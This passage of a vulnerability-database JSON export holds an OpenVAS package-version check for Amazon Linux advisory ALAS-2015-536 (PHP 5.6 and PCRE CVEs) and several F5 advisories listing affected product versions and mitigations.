rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-fpm\", rpm:\"php56-fpm~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pdo\", rpm:\"php56-pdo~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-odbc\", rpm:\"php56-odbc~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-xml\", rpm:\"php56-xml~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mcrypt\", rpm:\"php56-mcrypt~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-recode\", rpm:\"php56-recode~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-dba\", rpm:\"php56-dba~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-xmlrpc\", rpm:\"php56-xmlrpc~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pgsql\", rpm:\"php56-pgsql~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mbstring\", rpm:\"php56-mbstring~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pspell\", rpm:\"php56-pspell~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56\", rpm:\"php56~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-embedded\", rpm:\"php56-embedded~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-gmp\", rpm:\"php56-gmp~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-soap\", rpm:\"php56-soap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-opcache\", rpm:\"php56-opcache~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-tidy\", rpm:\"php56-tidy~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-snmp\", rpm:\"php56-snmp~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-dbg\", rpm:\"php56-dbg~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "pluginID": "1361412562310120222", "hash": "a72e7891e5cfa469229b15fb3be95a02746f5b7b0b30bf53e3e6c7a67f1c306f", "modified": "2016-11-15T00:00:00", "edition": 1, "cvelist": ["CVE-2015-2325", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "lastseen": "2017-07-02T21:12:30", "viewCount": 0, "enchantments": {}, "reporter": "Eero Volotinen", "objectVersion": "1.3", "references": ["https://alas.aws.amazon.com/ALAS-2015-536.html"]}}], "naslFamily": "Amazon Linux Local Security Checks", "id": "OPENVAS:1361412562310120222", "reporter": "Eero Volotinen", "published": "2015-09-08T00:00:00", "description": "Amazon Linux Local Security Checks", "title": "Amazon Linux Local Check: alas-2015-536", "bulletinFamily": "scanner", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Amazon Linux security check \n# $Id: alas-2015-536.nasl 6575 2017-07-06 13:42:08Z cfischer $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@iki.fi> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.120222\");\nscript_version(\"$Revision: 6575 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-08 13:20:42 +0200 (Tue, 08 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:42:08 +0200 (Thu, 06 Jul 2017) $\");\nscript_name(\"Amazon Linux Local Check: alas-2015-536\");\nscript_tag(name: \"insight\", value: \"An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. (CVE-2015-4021 )An integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-4022 )A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024 )It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4025 )It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4026 )PCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2325 )PCRE library is prone to a vulnerability which leads to Heap overflow. Without enough bound checking inside pcre_compile2(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2326 )\"); \nscript_tag(name : \"solution\", value : \"Run yum update php56 to update your system.\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://alas.aws.amazon.com/ALAS-2015-536.html\");\nscript_cve_id(\"CVE-2015-4021\",\"CVE-2015-4022\",\"CVE-2015-4025\",\"CVE-2015-4024\",\"CVE-2015-4026\",\"CVE-2015-2325\",\"CVE-2015-2326\");\nscript_tag(name:\"cvss_base\", value:\"7.5\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Amazon Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"php56-ldap\", rpm:\"php56-ldap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-bcmath\", rpm:\"php56-bcmath~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-cli\", rpm:\"php56-cli~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-intl\", rpm:\"php56-intl~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-devel\", rpm:\"php56-devel~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-common\", rpm:\"php56-common~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-imap\", rpm:\"php56-imap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-gd\", rpm:\"php56-gd~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mysqlnd\", rpm:\"php56-mysqlnd~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mssql\", rpm:\"php56-mssql~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-enchant\", rpm:\"php56-enchant~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-debuginfo\", rpm:\"php56-debuginfo~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-process\", rpm:\"php56-process~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-fpm\", rpm:\"php56-fpm~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pdo\", rpm:\"php56-pdo~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-odbc\", rpm:\"php56-odbc~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-xml\", rpm:\"php56-xml~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mcrypt\", rpm:\"php56-mcrypt~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-recode\", rpm:\"php56-recode~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-dba\", rpm:\"php56-dba~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-xmlrpc\", rpm:\"php56-xmlrpc~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pgsql\", rpm:\"php56-pgsql~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mbstring\", rpm:\"php56-mbstring~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pspell\", rpm:\"php56-pspell~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56\", rpm:\"php56~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-embedded\", rpm:\"php56-embedded~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-gmp\", rpm:\"php56-gmp~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-soap\", rpm:\"php56-soap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-opcache\", rpm:\"php56-opcache~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-tidy\", rpm:\"php56-tidy~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-snmp\", rpm:\"php56-snmp~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-dbg\", rpm:\"php56-dbg~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "pluginID": "1361412562310120222", "hash": "465b42b1c14295fa4e5071e396ed5f0d054197109c51db354cf2598ac0796896", "references": ["https://alas.aws.amazon.com/ALAS-2015-536.html"], "edition": 3, "cvelist": ["CVE-2015-2325", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "lastseen": "2017-07-24T12:53:50", "viewCount": 0, "enchantments": {"vulnersScore": 7.5}, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "051d3fa80639370fd8e85d743d26684b"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "df5cd238ab6ba820ee0b13c493f1bcd6"}, {"key": "href", "hash": "c987a25a392ca9438af43d057067b21a"}, {"key": "modified", "hash": "774d0176dfa389c0c71e9e200f95a6ba"}, {"key": "naslFamily", "hash": "df5cd238ab6ba820ee0b13c493f1bcd6"}, {"key": "pluginID", "hash": "15a1c50a40bcb97a18bd75742b61fd60"}, {"key": "published", "hash": "166e43b7efd51fc461aa157ed9ed169d"}, {"key": "references", "hash": "260dd5f8477dc74ecc091d01197c5f94"}, {"key": "reporter", "hash": "bb3dbc0ecae053747a8a163af717a25f"}, {"key": "sourceData", "hash": "135e225c708bd184a2226d1dab09a629"}, {"key": "title", "hash": "73a8d6ff1a2cd0ef2d387ce18a30cf50"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "objectVersion": "1.3", "modified": "2017-07-06T00:00:00"}

{"result": {"f5": [{"id": "SOL16983", "type": "f5", "title": "SOL16983 - PCRE library vulnerability CVE-2015-2325", "description": "* Although the BIG-IP/BIG-IQ/Enterprise Manager software contains the vulnerable code, BIG-IP/BIG-IQ/Enterprise Manager does not use the vulnerable code in a way that exposes the vulnerability. An attacker must have local access to BIG-IP/BIG-IQ/Enterprise Manager to trigger an exploit, which the attacker can then run arbitrary code. Therefore, F5 Product Development considers this vulnerability as Not Vulnerable in a standard configuration and Low Severity if management access to BIG-IP/BIG-IQ/Enterprise Manager is not adequately protected, for example over a secure network.\n\nVulnerability Recommended Actions\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability for affected F5 products, you should only permit management access to F5 products over a secure network and limit shell access to trusted users. For more information about securing access to BIG-IP/Enterprise Manager systems, refer to SOL13309: Restricting access to the Configuration utility by source IP address (11.x) and SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL12766: ARX hotfix matrix\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n", "published": "2015-07-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "http://support.f5.com/kb/en-us/solutions/public/16000/900/sol16983.html", "cvelist": ["CVE-2015-2325"], "lastseen": "2016-09-26T17:22:59"}, {"id": "F5:K16983", "type": "f5", "title": "PCRE library vulnerability CVE-2015-2325", "description": "\nF5 Product Development has assigned ID 533698 (BIG-IP), ID 533924 (BIG-IQ and Enterprise Manager), CPF-15037 (Traffix SDC), and ID 476508 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 \n11.6.0* \n11.0.0 - 11.5.4* \n10.1.0 - 10.2.4*| 12.1.0| Low| PCRE package \nBIG-IP AAM| 12.0.0 \n11.6.0* \n11.4.0 - 11.5.4*| 12.1.0| Low| PCRE package \nBIG-IP AFM| 12.0.0 \n11.6.0* \n11.3.0 - 11.5.4*| 12.1.0| Low| PCRE package \nBIG-IP Analytics| 12.0.0 \n11.6.0* \n11.0.0 - 11.5.4*| 12.1.0| Low| PCRE package \nBIG-IP APM| 12.0.0 \n11.6.0* \n11.0.0 - 11.5.4* \n10.1.0 - 10.2.4*| 12.1.0| Low| PCRE package \nBIG-IP ASM| 12.0.0 \n11.6.0* \n11.0.0 - 11.5.4* \n10.1.0 - 10.2.4*| 12.1.0| Low| PCRE package \nBIG-IP DNS| 12.0.0| 12.1.0| Low| PCRE package \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| None| Low| PCRE package \nBIG-IP GTM| 11.6.0* \n11.0.0 - 11.5.4* \n10.1.0 - 10.2.4*| 12.1.0| Low| PCRE package \nBIG-IP Link Controller| 12.0.0 \n11.6.0* \n11.0.0 - 11.5.4* \n10.1.0 - 10.2.4*| 12.1.0| Low| PCRE package \nBIG-IP PEM| 12.0.0 \n11.6.0* \n11.3.0 - 11.5.4*| 12.1.0| Low| PCRE package \nBIG-IP PSM| 11.0.0 - 11.4.1* \n10.1.0 - 10.2.4*| None| Low| PCRE package \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| None| Low| PCRE package \nBIG-IP WOM| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| None| Low| PCRE package \nARX| 6.0.0 - 6.4.0| None| Low| Perl Library \nEnterprise Manager| 3.0.0 - 3.1.1*| None| Low| PCRE package \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0*| None| Low| PCRE package \nBIG-IQ Device| 4.2.0 - 4.5.0*| None| Low| PCRE package \nBIG-IQ Security| 4.0.0 - 4.5.0*| None| Low| PCRE package \nBIG-IQ ADC| 4.5.0*| None| Low| PCRE package \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| None| Low| Reporting application \n \n**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\n* Although the BIG-IP/BIG-IQ/Enterprise Manager software contains the vulnerable code, BIG-IP/BIG-IQ/Enterprise Manager does not use the vulnerable code in a way that exposes the vulnerability. An attacker must have local access to BIG-IP/BIG-IQ/Enterprise Manager to trigger an exploit, which the attacker can then run arbitrary code. Therefore, F5 Product Development considers this vulnerability as Not Vulnerable in a standard configuration and Low Severity if management access to BIG-IP/BIG-IQ/Enterprise Manager is not adequately protected, for example over a secure network.\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability for affected F5 products, you should only permit management access to F5 products over a secure network and limit shell access to trusted users. For more information about securing access to BIG-IP/Enterprise Manager systems, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K12766: ARX hotfix matrix](<https://support.f5.com/csp/article/K12766>)\n * [K10942: Installing OPSWAT hotfixes on BIG-IP APM systems](<https://support.f5.com/csp/article/K10942>)\n", "published": "2015-07-22T23:31:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://support.f5.com/csp/article/K16983", "cvelist": ["CVE-2015-2325"], "lastseen": "2018-06-10T03:47:06"}, {"id": "F5:K16993", "type": "f5", "title": "PHP vulnerabilities CVE-2015-4025 and CVE-2015-4026", "description": "\nF5 Product Development has assigned IDs 532561 and 532562 (BIG-IP), ID 528817 (BIG-IQ), and ID 525232 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4| Low| PHP framework, Control Plane \nBIG-IP AAM| 11.6.0 \n11.4.0 - 11.5.3| 12.0.0 \n11.6.1 \n11.5.4| Low| PHP framework, Control Plane \nBIG-IP AFM| 11.6.0 \n11.3.0 - 11.5.3| 12.0.0 \n11.6.1 \n11.5.4| Low| PHP framework, Control Plane \nBIG-IP Analytics| 11.6.0 \n11.0.0 - 11.5.3| 12.0.0 \n11.6.1 \n11.5.4| Low| PHP framework, Control Plane \nBIG-IP APM| 11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4| Low| PHP framework, Control Plane \nBIG-IP ASM| 11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4| Low| PHP framework, Control Plane \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| PHP framework, Control Plane \nBIG-IP GTM| 11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 11.6.1 \n11.5.4| Low| PHP framework, Control Plane \nBIG-IP Link Controller| 11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4| Low| PHP framework, Control Plane \nBIG-IP PEM| 11.6.0 \n11.3.0 - 11.5.3| 12.0.0 \n11.6.1 \n11.5.4| Low| PHP framework, Control Plane \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| Low| PHP framework, Control Plane \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| PHP framework, Control Plane \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| PHP framework, Control Plane \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1| None| Low| PHP framework, Control Plane \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| PHP framework, Control Plane \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| PHP framework, Control Plane \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| PHP framework, Control Plane \nBIG-IQ ADC| 4.5.0| None| Low| PHP framework, Control Plane \nLineRate| None| 2.2.0 - 2.6.1 \n1.6.0 - 1.6.4| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.1.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n", "published": "2015-07-22T23:35:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://support.f5.com/csp/article/K16993", "cvelist": ["CVE-2006-7243", "CVE-2015-4025", "CVE-2015-4026"], "lastseen": "2017-06-08T00:16:40"}, {"id": "SOL16993", "type": "f5", "title": "SOL16993 - PHP vulnerabilities CVE-2015-4025 and CVE-2015-4026", "description": "Vulnerability Recommended Actions\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n", "published": "2015-07-22T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": 